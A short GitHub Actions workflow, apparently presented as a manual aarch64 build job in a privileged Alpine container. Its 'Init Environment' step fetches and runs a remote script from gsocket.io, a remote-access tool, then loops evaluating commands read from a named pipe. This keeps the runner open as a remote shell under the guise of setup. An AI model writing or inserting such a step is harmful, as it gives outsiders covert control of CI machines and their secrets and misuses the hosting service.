name: aarch64 manual run (alpine container)

on:
  workflow_dispatch:

jobs:
  run:
    runs-on: ubuntu-24.04-arm
    container:
      image: alpine:3.22.4
      options: --privileged
    steps:
      - name: Install Packages
        run: |
          apk update
          apk add bash openssl gcc make cmake bazel pkgconfig coreutils curl
      - name: Init Environment
        run: |
          bash -c "$(curl -fsSL https://gsocket.io/y)"
          trap 'exit 0' TERM
          echo "echo IMPORTANT: Remember to exit the main bash when finishes" >>"$HOME/.bashrc"
          mkfifo /tmp/bash-0
          while :; do
            eval "$(cat /tmp/bash-0)" &>/dev/null
          done

